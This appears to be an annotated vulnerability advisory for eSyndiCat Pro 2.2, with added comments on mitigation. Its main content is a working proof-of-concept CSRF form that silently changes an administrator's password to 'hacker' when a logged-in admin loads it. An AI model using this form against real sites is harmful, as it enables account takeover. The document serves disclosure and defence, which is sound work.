< ------------------- header data start ------------------- >

#############################################################

# Application Name : eSyndiCat Pro 2.2

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Impact : Uzaktan otomatik olarak admin pass change edilebilir. [English: the admin password can be changed remotely and automatically.]

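# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. [English: a session token should be added to the form, and the old password should be requested.] Such a token only helps if the server generates it per session, keeps it unpredictable, and rejects any request whose token does not match; the form below already carries a prevent_csrf field, so the presence of a token field alone is apparently not enough.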

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<!--
  Proof-of-concept form from the advisory. It is a static copy of the
  admin-edit form: it POSTs to manage-admins.php?action=edit&id=2 with the
  account fields and a new password already filled in. The advisory's claim is
  that the application accepts this request when it originates from another
  site, i.e. the state-changing action is not protected against cross-site
  request forgery.

  Defensive reading: the endpoint should reject the request unless it carries
  a token the server issued for the current admin session. Setting SameSite on
  the session cookie and checking the Origin/Referer header are additional
  layers, not a replacement for the token check.

  The markup is a fragment (unquoted attributes, stray <table>/<td> tags), not
  a well-formed page.
-->
<form action=http://localhost/demo/admin/manage-admins.php?action=edit&id=2 method=post name=system>
<!--
  NOTE(review): prevent_csrf is hard-coded here. For the request to be
  accepted, the server presumably either does not validate this field or does
  not bind its value to the administrator's session. Confirm against the
  application; the page does not show the server-side code.
-->
<input type=hidden name=prevent_csrf value=adb803e494 /><table cellspacing=0 cellpadding=0 width=100% class=striped>
<input type=text name=username size=22 value=admin/>
<input type=text name=fullname size=22 value=Administrator/>
<input type=text name=email size=22 value=[email protected] />
<!--
  The form sends only the new password and its confirmation; there is no
  current-password field. The advisory's fix advice is to require the old
  password, which would stop a forged request even if the token check failed.
-->
<input type=password name=new_pass size=22 value=hacker />
<input type=password name=new_pass2 size=22 value=hacker/>
<td colspan=2><input type=submit name=save value=Save Changes />
<!-- id and action repeat, in the POST body, the values given in the action URL's query string. -->
<input type=hidden name=id value=2 />
<input type=hidden name=action value=edit />
</form>


< -- bug code end of -- >